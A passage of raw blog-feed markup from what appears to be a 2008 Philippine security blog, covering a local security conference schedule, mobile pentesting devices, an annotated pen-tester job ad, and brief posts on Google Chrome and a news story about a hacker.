style=";font-family:&amp;quot;;" &gt;Cebu       Midtown Hotel, &lt;/span&gt;&lt;/strong&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;Fuente Osmeña,Cebu City, Philippines&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: left; color: rgb(255, 255, 255);" class="MsoNoSpacing"&gt;&lt;span style=";font-family:&amp;quot;;font-size:10;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;       &lt;/p&gt;&lt;table class="MsoNormalTable" style="border: medium none ; width: 383.85pt; margin-left: 41.4pt; border-collapse: collapse; color: rgb(0, 0, 0);" width="512" border="1" cellpadding="0" cellspacing="0"&gt;        &lt;tbody&gt;&lt;tr style="height: 27.95pt;"&gt;         &lt;td colspan="2" style="border: 1pt solid rgb(253, 233, 217); padding: 0in 5.4pt; background: black none repeat scroll 0% 0%; width: 383.85pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; height: 27.95pt;" width="512"&gt;         &lt;p class="MsoNoSpacing" style="text-align: center;" align="center"&gt;&lt;b style=""&gt;&lt;span style="color: rgb(255, 255, 255);font-size:16;" &gt;ONE DAY – FRIDAY&lt;span style=""&gt;          &lt;/span&gt;5 DECEMBER 2008&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;         &lt;/td&gt;        &lt;/tr&gt;        &lt;tr style="height: 24.5pt;"&gt;         &lt;td style="border-style: none solid solid; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217); border-width: medium 1pt 1pt; padding: 0in 5.4pt; width: 118.35pt; height: 24.5pt;" width="158"&gt;         &lt;p class="MsoNoSpacing"&gt;07:30am         – 08:00am&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;         &lt;td style="border-style: none solid solid none; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217) -moz-use-text-color; border-width: medium 1pt 1pt medium; padding: 0in 5.4pt; width: 265.5pt; height: 24.5pt;" width="354"&gt;         &lt;p class="MsoNoSpacing"&gt;Registration&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;        &lt;/tr&gt;        &lt;tr style="height: 24.5pt;"&gt;         &lt;td style="border-style: none solid solid; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217); border-width: medium 1pt 1pt; padding: 0in 5.4pt; width: 118.35pt; height: 24.5pt;" width="158"&gt;         &lt;p class="MsoNoSpacing"&gt;08:00am         – 10:00am&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;         &lt;td style="border-style: none solid solid none; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217) -moz-use-text-color; border-width: medium 1pt 1pt medium; padding: 0in 5.4pt; width: 265.5pt; height: 24.5pt;" width="354"&gt;         &lt;p class="MsoNoSpacing"&gt;Behind         the Scenes of Network Hacking + Live Demo&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;        &lt;/tr&gt;        &lt;tr style="height: 24.5pt;"&gt;         &lt;td style="border-style: none solid solid; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217); border-width: medium 1pt 1pt; padding: 0in 5.4pt; width: 118.35pt; height: 24.5pt;" width="158"&gt;         &lt;p class="MsoNoSpacing"&gt;10:00am         – 10:15am&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;         &lt;td style="border-style: none solid solid none; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217) -moz-use-text-color; border-width: medium 1pt 1pt medium; padding: 0in 5.4pt; width: 265.5pt; height: 24.5pt;" width="354"&gt;         &lt;p class="MsoNoSpacing"&gt;Q         &amp;amp; A / Coffee Break&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;        &lt;/tr&gt;        &lt;tr style="height: 24.5pt;"&gt;         &lt;td style="border-style: none solid solid; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217); border-width: medium 1pt 1pt; padding: 0in 5.4pt; width: 118.35pt; height: 24.5pt;" width="158"&gt;         &lt;p class="MsoNoSpacing"&gt;10:15am         – 12:15pm&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;         &lt;td style="border-style: none solid solid none; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217) -moz-use-text-color; border-width: medium 1pt 1pt medium; padding: 0in 5.4pt; width: 265.5pt; height: 24.5pt;" width="354"&gt;         &lt;p class="MsoNoSpacing"&gt;Protection         Against TCP/IP Attacks&lt;span style=""&gt;  &lt;/span&gt;+ Live         Demo&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;        &lt;/tr&gt;        &lt;tr style="height: 24.5pt;"&gt;         &lt;td style="border-style: none solid solid; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217); border-width: medium 1pt 1pt; padding: 0in 5.4pt; width: 118.35pt; height: 24.5pt;" width="158"&gt;         &lt;p class="MsoNoSpacing"&gt;12:15pm         – 01:00pm&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;         &lt;td style="border-style: none solid solid none; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217) -moz-use-text-color; border-width: medium 1pt 1pt medium; padding: 0in 5.4pt; width: 265.5pt; height: 24.5pt;" width="354"&gt;         &lt;p class="MsoNoSpacing"&gt;Lunch         Break&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;        &lt;/tr&gt;        &lt;tr style="height: 40.65pt;"&gt;         &lt;td style="border-style: none solid solid; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217); border-width: medium 1pt 1pt; padding: 0in 5.4pt; width: 118.35pt; height: 40.65pt;" width="158"&gt;         &lt;p class="MsoNoSpacing"&gt;01:30pm         – 3:00pm&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;         &lt;td style="border-style: none solid solid none; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217) -moz-use-text-color; border-width: medium 1pt 1pt medium; padding: 0in 5.4pt; width: 265.5pt; height: 40.65pt;" width="354"&gt;         &lt;p class="MsoNoSpacing"&gt;OSSEC         for (Linux, OpenBSD, FreeBSD, MacOS, Solaris and Windows) + Live Demo&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;        &lt;/tr&gt;        &lt;tr style="height: 24.5pt;"&gt;         &lt;td style="border-style: none solid solid; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217); border-width: medium 1pt 1pt; padding: 0in 5.4pt; width: 118.35pt; height: 24.5pt;" width="158"&gt;         &lt;p class="MsoNoSpacing"&gt;03:00pm         – 03:15pm&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;         &lt;td style="border-style: none solid solid none; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217) -moz-use-text-color; border-width: medium 1pt 1pt medium; padding: 0in 5.4pt; width: 265.5pt; height: 24.5pt;" width="354"&gt;         &lt;p class="MsoNoSpacing"&gt;Break&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;        &lt;/tr&gt;        &lt;tr style="height: 38.4pt;"&gt;         &lt;td style="border-style: none solid solid; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217); border-width: medium 1pt 1pt; padding: 0in 5.4pt; width: 118.35pt; height: 38.4pt;" width="158"&gt;         &lt;p class="MsoNoSpacing"&gt;03:15pm         – 05:00pm&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;         &lt;td style="border-style: none solid solid none; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217) -moz-use-text-color; border-width: medium 1pt 1pt medium; padding: 0in 5.4pt; width: 265.5pt; height: 38.4pt;" width="354"&gt;         &lt;p class="MsoNoSpacing"&gt;IronPort®         - Email Security Appliance from CISCO 2.5 + Live Demo&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;        &lt;/tr&gt;        &lt;tr style="height: 24.5pt;"&gt;         &lt;td style="border-style: none solid solid; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217); border-width: medium 1pt 1pt; padding: 0in 5.4pt; width: 118.35pt; height: 24.5pt;" width="158"&gt;         &lt;p class="MsoNoSpacing"&gt;5:00pm         – 5:30pm&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;         &lt;/td&gt;         &lt;td style="border-style: none solid solid none; border-color: -moz-use-text-color rgb(253, 233, 217) rgb(253, 233, 217) -moz-use-text-color; border-width: medium 1pt 1pt medium; padding: 0in 5.4pt; width: 265.5pt; height: 24.5pt;" width="354"&gt;         &lt;p class="MsoNoSpacing"&gt;Q         &amp;amp; A and Issuance of Certificate&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p style="text-align: left;" class="MsoNoSpacing"&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;/span&gt;&lt;span style=";font-size:10;color:white;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;       &lt;p class="MsoNoSpacing" style="text-align: left;"&gt;&lt;span style="font-style: italic;"&gt;What's interesting is that, except for the Hackacon Cebu, all the events seem to make it a point of not being commercialized e.g. not having corporate sponsors. This is a good thing since it was the biggest gripe against ManilaCon. Hopefully the PUOSUC pushes through. I won't be attending the defconph event since it's going to be held in Cebu and I'm not about to spend for airfare for a half-day event.&lt;/span&gt;&lt;span style="font-size:10;"&gt;&lt;o:p&gt; &lt;span style="font-size:100%;"&gt;&lt;span style="font-style: italic;"&gt;Same goes for the Hackacon event.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8395851488458297120?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8395851488458297120/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8395851488458297120' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8395851488458297120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8395851488458297120'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/11/upcoming-security-cons-gatherings-in.html' title='Upcoming Security Cons / Gatherings in the Philippines'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-9106807428959574865</id><published>2008-09-19T16:45:00.005+08:00</published><updated>2008-11-13T23:01:24.648+08:00</updated><title type='text'>Mobile Pentesting Devices</title><content type='html'>With the advent of netbooks, PDA's,  and cellphones capable of running a full-blown OS, there's no need to carry around a 3 kg. laptop to do your network security audits. The following are commercial devices tweaked to support a number of pentesting tools and applications.&lt;br /&gt;&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://www.neopwn.com/"&gt;NeoPwn&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Based on the &lt;a href="http://www.openmoko.com/"&gt;OpenMoko &lt;/a&gt;  platform. Uses Debian as the OS and runs open source pentesting tools with custom gui scripts. Cost is 699 US$ for the basic package.&lt;br /&gt;&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://www.immunitysec.com/products-silica.shtml"&gt;Silica&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.immunitysec.com/products-silica.shtml"&gt;&lt;br /&gt;&lt;/a&gt;&lt;a href="http://www.immunitysec.com/"&gt;Immunity&lt;/a&gt;'s mobile pentesting product. Based on the &lt;a href="http://www.nseries.com/nseries/v3/media/sections/products/tech_specs/en-R1/tech_specs_n800_en_R1.html"&gt;Nokia N800&lt;/a&gt; internet tablet. Runs custom software developed by Immunity. Cost is 3,600 US$ which includes software (exploit) updates for one year.&lt;br /&gt;&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://ipwn.mobi/"&gt;ipwn.mobi&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;H.D. Moore's side business. Uses the HP 2133 Mini-Note with the wifi card replaced with an atheros wifi card. Uses Kubuntu as the OS and most definitely runs Metasploit. Cost is 899 US$.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And then there are also the &lt;a href="http://forums.remote-exploit.org/archive/index.php/t-5662.html"&gt;homebrew ones&lt;/a&gt; ranging from Sharp Zaurus installed with pentest software, Windows Mobile PDA's with replaced firmware, UMPC's installed with Backtack, etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So if there's anyone out there who wants a mobile pentest device and can afford to buy an EEE and pay me 1,000 pesos for a Backtrack installation then just contact me =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-9106807428959574865?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/9106807428959574865/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=9106807428959574865' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/9106807428959574865'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/9106807428959574865'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/09/mobile-pentesting-devices.html' title='Mobile Pentesting Devices'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-3599396688204926363</id><published>2008-09-14T22:35:00.006+08:00</published><updated>2008-09-14T23:17:32.389+08:00</updated><title type='text'>Pen Tester Wanted</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.pilotpen.com.sg/products/images/ballpointpens/drgrip.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px;" src="http://www.pilotpen.com.sg/products/images/ballpointpens/drgrip.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Found on the LinuxJobs-PH mailing list. Almost every security enthusiast has this as a kind of dream job =) Unfortunately I don't think I qualify :(&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Good day,&lt;br /&gt;&lt;br /&gt;Hi guys, we still have one more opening for the position indicated below:&lt;br /&gt;&lt;br /&gt;Position/Title: Associate, Technology and Security Risk Services&lt;br /&gt;&lt;br /&gt;Description&lt;br /&gt;&lt;br /&gt;The SGV Security and Technology Solutions (STS) Team is a key&lt;br /&gt;component of SGV &amp;amp; Co. / Ernst &amp;amp; Young's Technology and Security Risk&lt;br /&gt;Services Practice. Ernst &amp;amp; Young's security professionals deliver&lt;br /&gt;enterprise security and risk-based services enabling our clients to&lt;br /&gt;take advantage of the evolving electronic economy in a secure manner.&lt;br /&gt;These professionals have extensive experience with information&lt;br /&gt;security protection, system security planning, information security&lt;br /&gt;assessments and implementation, security program development, business&lt;br /&gt;continuity planning, and strategic technology planning. These services&lt;br /&gt;help companies validate their infrastructure; design and implement&lt;br /&gt;business processes and technology solutions; address regulations; and&lt;br /&gt;educate and train management and employees. We currently have a career&lt;br /&gt;opportunity for a staff professional to participate in multiple client&lt;br /&gt;engagement teams and other related activities in our Security and&lt;br /&gt;Technology Solutions (STS) Team.&lt;br /&gt;&lt;br /&gt;The STS Team is dedicated to providing attack and penetration security&lt;br /&gt;testing and vulnerability assessment to discover and mitigate clients'&lt;br /&gt;security risks before they can be exploited by unauthorized parties.&lt;br /&gt;The STS Team is equipped and configured to provide maximum&lt;br /&gt;collaboration and teaming opportunities.&lt;br /&gt;&lt;br /&gt;Responsibilities&lt;br /&gt;&lt;br /&gt;•Perform vulnerability assessment and penetration testing in internet,&lt;br /&gt;intranet, dial-up and wireless environments&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;I think I can do these things =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Perform discovery and scanning for open ports and services&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;I can use nmap, superscan, etc and can most possibly learn how to use unicornscan, ikescan and a lot of other scanners =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Apply appropriate exploits to gain access and expand access as appropriate&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;Honestly I like metasploit for the exploits and meterpreter as the payload to pivot inside a network. And I know how to use net commands and how to psexec on windows networks =) Oh and a milw0rm compilation .tgz file is handy =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Participate in activities involving application penetration testing&lt;br /&gt;and application source code review&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;I'm more partial to black box testing. Anything more complex than greppable insecure methods in source code usually means  a lot of time required to exploit it =)  &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Interact with the client as required throughout the engagement&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;Sure. If needed =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Prepare reports documenting discoveries during the engagement&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;No problem =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Debrief the client at the conclusion of each engagement&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;I can probaly do this too =&lt;/span&gt;)&lt;br /&gt;&lt;br /&gt;•Participate in research and provide recommendations for continuous improvement&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Ditto =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Participate in knowledge sharing&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;I blog dude =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Qualifications&lt;br /&gt;&lt;br /&gt;To qualify, candidates must have:&lt;br /&gt;&lt;br /&gt;•A bachelor's or master's degree in computer science, information&lt;br /&gt;technology, computer engineering, or a related major&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;Nope. I'm not an IT grad&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•1 to 2 years of experience in one or more of the following:&lt;br /&gt;UNIX-based Operating Systems (Linux, IBM AIX, HP-UX, Solaris, Mac OS&lt;br /&gt;X), Windows, networking and wireless security; attack and penetration&lt;br /&gt;testing; security testing of web-based applications; and application&lt;br /&gt;security source code assessments. Fresh graduates are welcome to apply&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Used to be a  part-time *ehrm*.... But I graduated from that =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Experience with programming languages/platforms such as Java, J2EE,&lt;br /&gt;x86 Assembly Language, C, C++, ASP, PERL, PHP, Ruby and Microsoft .NET&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;If I can program passably well in any of those languages I'd seek work as a programmer and not bother with security at all =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Experience in commercial and open source security tools including&lt;br /&gt;BackTrack, Cain, Metasploit, CANVAS, WebInspect, Retina, ISS, and&lt;br /&gt;Nessus/OpenVAS is a plus&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Have used BackTrack, cain, Metasploit and Nessus. I have an old copy of CANVAS but it's way too old so I haven't played with it much. Oh, and why isn't Core Impact on the list? Too expensive =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Manual attack and penetration testing experience above and beyond&lt;br /&gt;running automated tools is a plus&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;IMHO, this shouldn't be a "plus", it should be required&lt;/span&gt; &lt;span style="font-weight: bold; font-style: italic;"&gt;=)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Experience developing custom scripts or programs (used for port&lt;br /&gt;scanning, vulnerability identification and exploitation) is a plus&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;I can use/learn more bash scripting =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Application development experience is a plus&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Zero here =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Strong technical skills related to a broad range of operating systems&lt;br /&gt;and databases&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Define strong =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•An understanding of web-based application vulnerabilities&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;I sorta have minor experience on finding vulns with web apps =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•An understanding of global standards like COBIT, GLBA, HIPAA, FFIEC,&lt;br /&gt;PCI DSS, and ISO/IEC 27001/27002/20000&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;I honestly have been trying to find time to read up on PCI DSS but I've been kinda busy =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Excellent teaming and communication skills&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Yada yada blah blah blah =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Demonstrated integrity in a professional environment&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Sure =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;•Willingness and ability to travel (including potential overseas&lt;br /&gt;travel for international clients)&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Yes! =)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The successful candidate must hold or be willing to pursue related&lt;br /&gt;professional certifications such as CISSP, CISM, CEH, ECSA, LPT, GSEC&lt;br /&gt;and/or CISA.&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Hey, If you're going to pay for it... =) The exam fee alone is expensive not to mention the courses to prepare for it&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If you are interested or have any questions, please email&lt;br /&gt;your resume or queries to christian.s.masancay@???.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Hmm... =)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-3599396688204926363?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/3599396688204926363/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=3599396688204926363' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3599396688204926363'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3599396688204926363'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/09/pen-tester-wanted.html' title='Pen Tester Wanted'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-1388398341818971916</id><published>2008-09-08T09:23:00.001+08:00</published><updated>2008-09-08T09:27:26.012+08:00</updated><title type='text'>Fast!</title><content type='html'>HFS! Google Chrome when used with Privoxy &lt;a href="http://www.fritscher.ch/blog/2008/09/03/google-chrome-adblock-with-privoxy/"&gt;(to filter ads)&lt;/a&gt; is fast!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-1388398341818971916?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/1388398341818971916/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=1388398341818971916' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1388398341818971916'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1388398341818971916'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/09/fast.html' title='Fast!'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-1349206933949881936</id><published>2008-09-04T15:53:00.004+08:00</published><updated>2008-09-04T16:03:14.639+08:00</updated><title type='text'>Google Chrome Browser Exploit</title><content type='html'>First published exploit for Google's Chrome Browser. Automatically downloads a file without prompting the user. However it does not seem to automatically execute the downloaded file so the risk is not that great.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://milw0rm.com/exploits/6355"&gt;http://milw0rm.com/exploits/6355&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-1349206933949881936?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/1349206933949881936/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=1349206933949881936' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1349206933949881936'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1349206933949881936'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/09/google-chrome-browser.html' title='Google Chrome Browser Exploit'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-4515093020292528451</id><published>2008-09-03T11:27:00.002+08:00</published><updated>2008-09-03T11:32:15.769+08:00</updated><title type='text'>Google Browser Released</title><content type='html'>&lt;a href="http://www.google.com/chrome"&gt;http://www.google.com/chrome&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Google recently released Google Chrome (BETA) an open source browser. I'm betting there's about a hundred people fuzzing the hell out of it right now =)&lt;br /&gt;&lt;h2&gt;&lt;br /&gt;&lt;/h2&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-4515093020292528451?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/4515093020292528451/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=4515093020292528451' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4515093020292528451'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4515093020292528451'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/09/google-browser-released.html' title='Google Browser Released'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5242482256102672525</id><published>2008-09-03T09:10:00.002+08:00</published><updated>2008-09-03T09:14:32.022+08:00</updated><title type='text'>MySpace Cofounder Tom Anderson Was A Real Life “WarGames” Hacker in 1980s</title><content type='html'>&lt;a href="http://www.techcrunch.com/2008/08/30/myspace-cofounder-tom-anderson-was-a-real-life-wargames-hacker-in-1980s/"&gt;http://www.techcrunch.com/2008/08/30/myspace-cofounder-tom-anderson-was-a-real-life-wargames-hacker-in-1980s/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"In 1985, when he was fourteen and in high school in Escondido, California, Anderson was subject to one of the largest FBI raids in California history after hacking into a Chase Manhattan Bank computer system and subsequently showing his friends how to do it. He was never arrested because he was a minor, but the FBI confiscated all of his computer equipment and some newspaper accounts of the incident stated incorrectly (see image below from a 1986 LA Times story) that he was 